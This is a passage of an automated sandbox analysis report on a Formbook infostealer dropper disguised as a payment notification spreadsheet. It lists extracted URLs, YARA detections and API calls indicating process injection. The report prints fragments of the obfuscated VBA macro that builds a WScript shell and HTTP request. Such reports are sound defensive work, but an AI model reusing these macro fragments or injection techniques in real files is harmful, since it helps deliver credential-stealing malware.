    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.onedrive.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://augloop.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.entity.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/documentvirality/prod/index.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/progressui/index.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://cr.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://directory.services.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.windows.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://graph.windows.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.microsoftonline.com/common
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.local
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://management.azure.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://management.azure.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://messaging.office.com/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officeapps.live.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://retailer.osi.office.net/appstate/query
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://settings.outlook.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://tasks.office.com
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: https://www.odwebp.svc.ms

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000004.00000003.1121140244.0000000006441000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000004.00000003.1120953960.0000000006457000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000007.00000002.1245838529.000000001EF40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000003.1121082322.00000000037FC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\mso8D7C.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: Shell "type NUL > " + TXTFile
    Document contains an embedded VBA macro with suspicious stringsShow sources
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = ""WScript""" + vbCrLf
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " sWScript = sWScript + "".""" + vbCrLf
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " m = sWScript + ""Sh""" + vbCrLf
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" " + vbCrLf
    Source: Payment_Notification.pdf.csvOLE, VBA macro line: xcvbnmcvnm = xcvbnmcvnm + " Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" + vbCrLf
    Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
    Source: Payment_Notification.pdf.csvStream path 'VBA/Module1' : found possibly 'ADODB.Stream' functions position, open, read, readtext, write
    Microsoft Office drops suspicious filesShow sources
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\programdata\asc.txt:script1.vbsJump to behavior
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078AB8 NtSetContextThread,6_2_02078AB8
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02072F55 NtWriteVirtualMemory,6_2_02072F55
    Source: C:\ProgramData\tmp.exeCode function: 6_2_0207076E EnumWindows,NtSetInformationThread,TerminateProcess,6_2_0207076E
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020785E3 NtProtectVirtualMemory,6_2_020785E3
    Source: C:\ProgramData\tmp.exeCode function: 6_2_0207084D NtSetInformationThread,TerminateProcess,6_2_0207084D
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078E80 NtSetContextThread,6_2_02078E80
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020708A5 NtSetInformationThread,TerminateProcess,6_2_020708A5
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020792A1 NtSetContextThread,6_2_020792A1
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020730AB NtWriteVirtualMemory,6_2_020730AB
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078AC1 NtSetContextThread,6_2_02078AC1
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020790CB NtSetContextThread,6_2_020790CB
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020732DE NtWriteVirtualMemory,6_2_020732DE
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078F1B NtSetContextThread,6_2_02078F1B
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078D44 NtSetContextThread,6_2_02078D44
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02073543 NtWriteVirtualMemory,6_2_02073543
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078B5D NtSetContextThread,6_2_02078B5D
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02072F9F NtWriteVirtualMemory,6_2_02072F9F
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078FB9 NtSetContextThread,6_2_02078FB9
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020731B8 NtWriteVirtualMemory,6_2_020731B8
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078DE6 NtSetContextThread,6_2_02078DE6
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020791EF NtSetContextThread,6_2_020791EF
    Source: C:\ProgramData\tmp.exeCode function: 6_2_020733E9 NtWriteVirtualMemory,6_2_020733E9
    Source: C:\ProgramData\tmp.exeCode function: 6_2_02078BFE NtSetContextThread,6_2_02078BFE
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA610 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_1F1CA610
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA6A0 NtCreateSection,LdrInitializeThunk,7_2_1F1CA6A0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA560 NtQuerySystemInformation,LdrInitializeThunk,7_2_1F1CA560
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA480 NtMapViewOfSection,LdrInitializeThunk,7_2_1F1CA480
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA360 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_1F1CA360
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA3E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_1F1CA3E0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA2D0 NtClose,LdrInitializeThunk,7_2_1F1CA2D0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA710 NtQuerySection,7_2_1F1CA710
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA700 NtProtectVirtualMemory,7_2_1F1CA700
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA720 NtResumeThread,7_2_1F1CA720
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA750 NtCreateFile,7_2_1F1CA750
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA780 NtOpenDirectoryObject,7_2_1F1CA780
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA650 NtQueueApcThread,7_2_1F1CA650
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA6D0 NtCreateProcessEx,7_2_1F1CA6D0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA520 NtEnumerateKey,7_2_1F1CA520
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CBD40 NtSuspendThread,7_2_1F1CBD40
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA540 NtDelayExecution,7_2_1F1CA540
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA5A0 NtWriteVirtualMemory,7_2_1F1CA5A0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA5F0 NtReadVirtualMemory,7_2_1F1CA5F0
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA410 NtQueryInformationToken,7_2_1F1CA410
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CB410 NtOpenProcessToken,7_2_1F1CB410
    Source: C:\ProgramData\tmp.exeCode function: 7_2_1F1CA430 NtQueryVirtualMemory,7_2_1F1CA430
